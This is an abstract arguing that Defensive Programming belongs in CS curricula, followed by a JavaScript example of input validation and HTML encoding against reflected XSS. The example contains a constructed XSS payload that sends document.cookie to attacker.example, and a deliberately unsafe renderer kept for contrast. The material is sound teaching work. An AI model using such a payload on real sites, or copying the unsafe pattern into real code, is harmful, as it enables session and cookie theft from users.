ABSTRACT
This paper presents principles of Defensive Programming and examines the growing concern that these principles are not effectively incorporated into the curricula of Computer Science and related computing degree programs. To substantiate this concern, Defensive Programming principles are applied to a case study: cross-site scripting (XSS) attacks. The paper concludes that Defensive Programming plays an important role in preventing such attacks and should therefore be integrated more aggressively into CS courses such as Programming, Algorithms, Databases, Computer Architecture and Organization, and Computer Networks.
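As an added illustration of the case study the abstract describes (this is example code written for this page, not code from the paper or its authors), the block below applies two Defensive Programming principles to a reflected-XSS scenario: validate untrusted input against an allowlist at the trust boundary, and encode output for the context it is rendered into. The greeting renderer, the `name` parameter and the attack payload are all constructed for the example; the vulnerable renderer is kept beside the hardened one so the difference is visible on the same input.

```javascript
// Added example: defensive programming against reflected XSS.
// Scenario (assumed): a server-side template echoes a user-supplied
// "name" parameter into an HTML page. All inputs below are constructed.

// Vulnerable: concatenates untrusted input straight into HTML markup.
function renderGreetingUnsafe(name) {
  return `<p>Hello, ${name}!</p>`;
}

// Principle 1: validate input against an allowlist at the boundary.
// Letters, digits, spaces, apostrophes and hyphens only, bounded length.
const NAME_PATTERN = /^[\p{L}\p{N} '-]{1,64}$/u;
function validateName(name) {
  if (typeof name !== 'string' || !NAME_PATTERN.test(name)) {
    throw new TypeError('invalid name');
  }
  return name;
}

// Principle 2: encode output for the context it lands in. This table
// covers HTML element content and double-quoted attribute values; a
// JavaScript-string or URL context would need a different encoder.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
};
function encodeForHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened: encode on output. Safe on its own for this context, but it
// does not reject malformed input early.
function renderGreetingSafe(name) {
  return `<p>Hello, ${encodeForHtml(name)}!</p>`;
}

// Both layers together: validation rejects clearly malformed input,
// encoding neutralises what the allowlist still admits (e.g. the
// apostrophe in "O'Brien", which would break an attribute context).
function renderGreetingDefensive(name) {
  return renderGreetingSafe(validateName(name));
}

// Constructed reflected-XSS payload.
const PAYLOAD =
  '<script>location="https://attacker.example/?c="+document.cookie</script>';

// Runs the three renderers over the payload and a legitimate name and
// returns the results so they can be inspected or asserted on.
function demo() {
  let defensive;
  try {
    defensive = renderGreetingDefensive(PAYLOAD);
  } catch (e) {
    defensive = `rejected: ${e.message}`;
  }
  return {
    unsafe: renderGreetingUnsafe(PAYLOAD),     // script tag reaches the browser
    safe: renderGreetingSafe(PAYLOAD),         // rendered as inert text
    defensive,                                 // rejected before rendering
    legit: renderGreetingDefensive("O'Brien"), // accepted and encoded
  };
}

console.log(demo());
```

The point the paper's thesis makes is visible in `demo()`: the unsafe renderer hands the browser a live script element, the encoding renderer turns the same bytes into text, and the combined renderer refuses the input outright while still handling a legitimate name that contains a character the encoder must escape. Neither validation nor encoding alone is sufficient across all rendering contexts, which is why both are taught as Defensive Programming habits rather than as a single fix.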